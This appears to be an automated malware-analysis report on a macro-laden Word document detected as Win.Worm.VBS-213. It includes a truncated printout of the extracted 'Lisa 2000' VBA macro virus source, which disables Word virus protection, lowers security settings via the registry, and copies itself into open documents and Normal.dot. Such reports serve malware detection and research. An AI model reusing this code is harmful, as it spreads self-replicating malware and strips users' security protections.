MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' macro is configured to execute automatically, disabling virus protection and attempting to modify security settings. The ClamAV detection of 'Win.Worm.VBS-213' and the presence of the 'CreateObject' call strongly suggest the execution of a malicious script designed to download and execute a secondary payload. The macro also attempts to modify the security level for Word 2000 to 1, which is a low security setting.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9670 bytes |
SHA-256: 1be6f5cf351e5e8c11a45d0443021f5a0565710d26a6e8944f010f19b3b82168 |
|||
|
Detection
ClamAV:
Win.Worm.VBS-213
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
buratino
End Sub
Private Sub Document_New()
On Error Resume Next
buratino
End Sub
Private Sub Document_Open()
On Error Resume Next
poslat
buratino
End Sub
Private Sub buratino()
'Lisa 2000.1'
'Âńĺ ďîćĺëŕíč˙ ńëŕňü íŕ "Slava_atrancev@mail.ru"'
'___Íĺ ďîęŕçűâŕňü âîçíčęŕţůčĺ îřčáęč___'
On Error Resume Next
'___Îňęëţ÷ĺíčĺ çŕůčňű îň âčđóńîâ äë˙ âîđäŕ 97___'
Application.Options.VirusProtection = False
'___Îňęëţ÷ĺíčĺ çŕůčňű îň âčđóńîâ äë˙ âîđäŕ 2000___'
System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
'___Îáíîâëĺíčĺ âĺđńčč___'
t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
For nb = 1 To t
If Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) = "'Lisa 2000'" Then
GoTo faan
End If
Next nb
GoTo foon
faan:
For gb = 1 To t
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines (1)
Next gb
foon:
s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
For k = 1 To Application.Documents.Count
t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
If t > 0 Then
For nb = 1 To t
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) = "'Lisa 2000'" Then
GoTo faan1
End If
Next nb
GoTo foon1
faan1:
For gb = 1 To t
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines (1)
Next gb
foon1:
End If
Next k
'___Çŕđŕćĺíčĺ îňęđűňűő äîęóěĺíňîâ___'
s = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.countoflines
d = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, s)
For k = 1 To Application.Documents.Count
t = Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.countoflines
If t = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
'___Óáđŕňü đĺćčě íĺâčäčěęč čç çŕđŕćĺííîăî ôŕéëŕ___'
Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 22
End If
Next k
'___Çŕđŕćĺíčĺ Normal.dot (Ŕâňîçŕăđóçęŕ)___'
t = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.countoflines
If t = 0 Then
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, d
'___Đĺćčě íĺâčäčěęč____'
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End Sub"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.ShowVisualBasicEditor = True"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End If"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Next X"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Next nb"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "End If"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.Documents.Item(X).Saved = True"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "Application.Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, m"
Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, "If Application.Documents.Item(X).VBProject.VBComponents.Item(1).CodeModule.Lines(nb, 1) =" + Chr(34) + Chr(39) + "Lisa 2000.1" + Chr(39) + Chr(34) + " Then"
Application.NormalTemp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.